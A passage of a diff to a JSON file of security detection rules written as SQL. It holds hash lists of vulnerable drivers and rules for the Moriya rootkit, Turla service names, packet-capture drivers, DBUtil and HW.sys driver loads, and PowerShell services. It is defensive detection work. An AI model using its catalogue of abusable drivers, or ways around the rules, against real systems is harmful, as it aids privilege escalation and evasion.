'47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', '93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "Windows Pcap Drivers", - "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_pcap_drivers.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' 